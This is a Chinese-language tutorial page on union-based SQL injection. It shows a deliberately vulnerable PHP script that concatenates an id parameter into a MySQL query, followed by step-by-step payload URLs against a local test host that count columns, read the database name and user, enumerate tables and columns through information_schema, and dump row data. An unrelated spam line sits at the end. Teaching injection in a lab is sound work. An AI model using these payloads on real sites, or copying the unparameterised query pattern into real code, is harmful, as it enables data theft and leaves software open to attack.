<ruby id="bdb3f"></ruby>

    <p id="bdb3f"><cite id="bdb3f"></cite></p>

      <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
        <p id="bdb3f"><cite id="bdb3f"></cite></p>

          <pre id="bdb3f"></pre>
          <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

          <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
          <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

          <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                <ruby id="bdb3f"></ruby>

                ??碼云GVP開源項目 12k star Uniapp+ElementUI 功能強大 支持多語言、二開方便! 廣告
                數據表ganyuan ![](https://img.kancloud.cn/fb/20/fb2066c4812ec07fcbd86e614b92fd52_935x73.png) 后端代碼 ``` $id=$_GET['id']; var_dump($id); $query="select * from ganyuan where id=$id"; echo "<br>"; echo $query; $link=mysqli_connect("localhost","root","root",$dbname = "test"); mysqli_select_db($link,'test'); if ($res=mysqli_query($link,$query)) { $rows=mysqli_fetch_array($res);//MYSQLI_ASSOC,MYSQLI_NUM或MYSQLI_BOTH; var_dump($rows); }else{ echo $res.'|||'; } ``` 1、orderby確定列數(超過9不會返回數據,所以確定該表9列) ``` http://www.test.com/audit/sql.php?id=1%20order%20by%209 http://www.test.com/audit/sql.php?id=1%20union%20select%201,2,3,4,5,6,7,8,9; ``` 查出數據庫名以及mysql用戶名 ``` http://www.test.com/audit/sql.php?id=-1%20union%20select%20/*!database()*/,/*!user()*/,3,4,5,6,7,8,9; ``` ![](https://img.kancloud.cn/a0/bd/a0bd54988327d5077f83241e323c5610_227x326.png) 查出表名 原sql查詢單條數據的時候,默認返回的是第一個表名,如果需要查詢其他的表名則可以通過添加limit 0,1 ~limit n,1來實現 ``` http://www.test.com/audit/sql.php?id=-1%20union%20select%201,table_name,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema%20=%20%27test%27; ``` ![](https://img.kancloud.cn/39/92/39920fa1cb9aaf4b1155737a380be51f_247x333.png) ``` http://www.test.com/audit/sql.php?id=-1%20union%20select%201,table_name,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema%20=%20%27test%27%20limit%203,1; ``` ![](https://img.kancloud.cn/03/03/0303bbd40f0ea7759cdac4b116d47951_227x335.png) 根據表查詢表有哪些字段(通過加limit 0,1 ~ limit 8,1) ``` http://www.test.com/audit/sql.php?id=-1%20union%20select%201,column_name,3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_schema%20=%20%27test%27%20and%20table_name=%27ganyuan%27%20limit%208,1; ``` ![](https://img.kancloud.cn/b8/32/b832175040b43b9cb350daccab282b79_237x335.png) ``` http://www.test.com/audit/sql.php?id=-1%20union%20select%201,concat_ws(char(32,58,32),id,name,sex,star,pos,url,seniority,profession),3,4,5,6,7,8,9%20from%20ganyuan%20limit%202,1; ``` ![](https://img.kancloud.cn/5d/5a/5d5a32d76fac3412a40171db962e21ed_802x323.png)
                  <ruby id="bdb3f"></ruby>

                  <p id="bdb3f"><cite id="bdb3f"></cite></p>

                    <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
                      <p id="bdb3f"><cite id="bdb3f"></cite></p>

                        <pre id="bdb3f"></pre>
                        <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

                        <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
                        <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

                        <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                              <ruby id="bdb3f"></ruby>

                              哎呀哎呀视频在线观看